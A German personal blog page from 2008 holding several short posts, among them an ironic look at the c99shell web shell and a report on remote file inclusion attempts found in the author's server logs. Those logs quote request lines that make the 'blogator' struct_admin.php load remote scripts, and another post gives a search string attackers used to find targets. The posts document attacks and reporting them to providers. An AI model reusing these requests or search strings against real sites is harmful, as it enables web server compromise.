Schnipsel

Im Herbst, wenn der Sonne die Kraft fehlt, sich über den Horizont zu heben und das Nebelmeer das Moor verschlingt, treffen sich die Männer der Schmiedegilde. Dunkle Ehrenmänner, glatte Gesichter mit böse blitzenden Augen unter dem Vorsitz des finsteren Meisters Wilkinson, dessen Bajonette schon das Empire gross und die Eingeborenen blutleer gemacht haben. Da sitzen sie dann und trinken und flüstern. Sie raunen "Protector", "Contour Plus" und "Sensor Excel", zum Anstossen rufen sie "Mach 3!" und dann lachen sie, ein heiseres Lachen voller Hass auf die Menschheit.

Und wenn sie auseinandergehen, haben sie ein neues Rasierklingensystem entwickelt, zu dem noch niemand einen passenden Griff zuhause hat. Und ich Depp fall jedes Mal drauf rein...

Da mir die letzten Tage so viele Leute irgendwelche PHP-Dateien hochladen wollten, hab ich mir mal angesehen, was so angespült wird. Das meiste ist langweilig, aber ich hab mich auch mal mit der betagten, dabei immer noch sehr beliebten c99shell beschäftigen können. Zuerst nur in einer arabischen Version, die mir ein freundlicher Mensch aus Palästina geben wollte (wirklich ein Mensch, kein Bot, der Typ hat nach "powered +by +struct_admin.php" gesucht), aber die englische Version war auch schnell zu finden.

Ich bin ganz begeistert über dieses Tool. Ich kenne kommerzielle Systemverwaltungen, deren Funktionsumfang nicht so gross ist. Die Bedienung ist einfach, die Installation geradezu ein Kinderspiel: Eine Datei hochladen und alles ist fertig, häufig merkt nicht mal der Besitzer der Seite was davon. Sogar einen Editor liefern sie mit und an Infos über den Server findet man alles, was das Herz begehrt.

Für Leute, die auch mal so ein schönes Tool ausprobieren möchten, hab ich eine Demoversion gebastelt. Viel funktioniert da nicht, ein paar Mausklicks kann man aber machen. Aktive Elemente sind rausgenommen und was man da sieht, ist auch nicht dieser Server, sondern ein Rechner bei mir zuhause. Wer sich für sowas interessiert, der kann auf nebenstehenden Screenshot klicken und ein bisschen rumspielen.

Quellcode muss sich natürlich jeder selber besorgen, oder installieren lassen...

Die beiden grossen Kirchen schliessen sich zusammen und bauen eine Arche. An der Mangfall...

Hätte ich nur am Montag keinen Link auf ein Blog namens "blogator" gesetzt... Jetzt wird dieser Beitrag bei irgendwelchen Suchmaschinen mit diesem Begriff gefunden und jedes script kiddie probiert mal aus, ob er bei mir die Sicherheitslücke der zufällig gleichnamigen französischen Blogsoftware ausnützen kann. Ihr könnt mich damit in Ruhe lassen, ich verwende eine andere Software, die bestimmt Lücken, aber halt andere hat.

Mein Log ist jedenfalls voll von Versuchen der Art

GET /2008/03/31/kurzer-ausflug-nach-25// include/struct_admin.php? incl_page= http://---irgendein-provider---/ imgcls/cmd2.txt?????

Wenn man dann bei ---irgendein-provider---/ imgcls/cmd2.txt nachschaut, was da eingebunden wird, findet man ein Script, das anscheinend nur Betriebssystem, Username und Plattenplatz ausgibt. Nichts weiter tragisches, anscheinend nur die Vorbereitung spezifischerer Versuche. Die Versuche finden ausschliesslich bei diesem Beitrag statt, sind also kein Rundumschlag in irgendwelchen Blogs, sondern bestimmt das Ergebnis einer Suche bei irgendeiner Suchmaschine.

Zwei dieser Webprovider hab ich mal testweise angeschrieben, dass sie ihren Kunden bitte bescheidgeben:

• Eine Seite war bei Geocities. Da hab ich Yahoo eine Mail geschreiben. Das eigentlich dafür vorgesehene Kontaktformular wurde auf deren Server nicht gefunden...


• Der andere Provider ist ein kleiner Provider aus Coburg. Der hatte ein Formular für Petzer, zwingt mich aber, dort dazu unsinnige "Muss-Felder" mit für beide Seiten nutzlosen Infos auszufüllen. Es hat keinen Sinn, die IP-Adresse einer virenverseuchten Homepage abzutippen. Aber wenn die das möchten, geb ich gern irgendwas ein...

Die Kunden können natürlich auch wenig dafür (ausser dass sie hackbare Anwendungen ins Netz stellen), aber sie sollten wenigstens informiert sein, dass ihre Homepage über z.B. "Entgiftungspflaster mit der Kraft alter Bäume" im Nebenjob als Virenschleuder dient. Viel Erfolg versprech ich mir davon aber nicht. Bei den meisten Providern beschränkt sich das Abuse-Handling auf den Aufbau von Hürden für den Beschwerdeführer.

Ausser den aufgemachten Servern mit dem Script gibts noch einen zweiten Beteiligten, den der diese URL zusammenbastelt und bei mir aufruft. Ich vermute aber, der kann auch nichts dafür, das geht auch schon automatisch ohne Wissen und Beteiligung des Menschen vor dem Monitor. Anderfalls wären die Leute entweder alle mit Textbrowsern unterwegs oder würden im Sekundentakt den Browser wechseln (oder dessen Identifikation mit jedem aufruf wechseln lassen). Wäre denkbar, aber für Kinder eher untypisch...

Die Internetprovider dieser Leute kann ich allerdings nicht anschreiben. Da ich hier ja auf die Speicherung der IP-Adressen der Besucher verzichte, kann ich für vergangene Zugriffe die IP-Adresse der Besucher nur ungefähr sagen. Z.B. kommt dann ein verstümmeltes "bzrhbcesvl.schulradio-bayern.de" raus, damit brauche ich beim Provider nicht ankommen. Und aussschalten mag ich die Pseudonymisierung jetzt auch nicht, dazu werden auch bei Internetprovidern Hinweise der Art "He Dein Kunde hackt hier rum oder hat nen Virus" zu missmutig bearbeitet.

Nachtrag: Die suchen bei Technorati oder Google-Blogsuche nach "blogator". 2 Stunden nach Veröffentlichung tauchen die ersten Zugriffe auf diesen Beitrag auf:

/2008/04/05/falsche-luecke// _blogadata/ include/ struct_admin.php? incl_page= http:// ---egal --- /ioncube/readme.txt??

Nachtrag 2: 5 Stunden nach meiner Mail hat übrigens Geocities die Seite abgeklemmt. Ich weiss natürlich nicht, ob ich der einzige war, der was geschrieben hat, vermutlich suchen die auch selbst ihre Seiten nach Schädlingen ab. Die schnelle Reaktion hat mich jedenfalls überrascht.

Den passendsten Kommentar zum neuesten Scheingefecht der Koalition zur Online-Durchsuchung fand ich im Heise-Forum. Es geht jetzt darum, ob die Wanze auch auf dem Rechner installiert werden kann, wenn man technisch noch nicht so weit ist, das online zu erledigen. Dann muss der Polizist ja heimlich in die Wohnung einbrechen, den Trojaner installieren und wieder verschwinden. Die SPD findet nun dieses Detail (bis auf weiteres) untragbar und mit ihr nicht machbar, während der Innenexperte der CDU Clemens Binninger das ganz normal findet:

„Es liegt doch in der Natur der Sache, dass wir, wenn wir den Sicherheitsbehörden aus guten Gründen die Online-Durchsuchung erlauben, ihnen auch die Möglichkeit geben müssen, im Bedarfsfall physisch auf den Rechner zuzugreifen.“ Dabei handele es sich schließlich nicht um eine Durchsuchung der Wohnung des Verdächtigen, sondern lediglich um ein Betreten. „Und das ist von der heutigen Verfassungslage im Bereich der Gefahrenabwehr gedeckt.“

Und dazu meinte der FuntKlakow

PC verstecken

Dann reicht es also aus, den PC so zu platzieren, das man ihn nicht auf den ersten Blick sieht. Wenn er dann die Wohnung nach dem PC durchsuchen muss, handelt er rechtswidrig! ;-)

Ich finde, schöner kann man die bizarre Welt in der unsere Innenexperten anscheinend leben nicht kommentieren.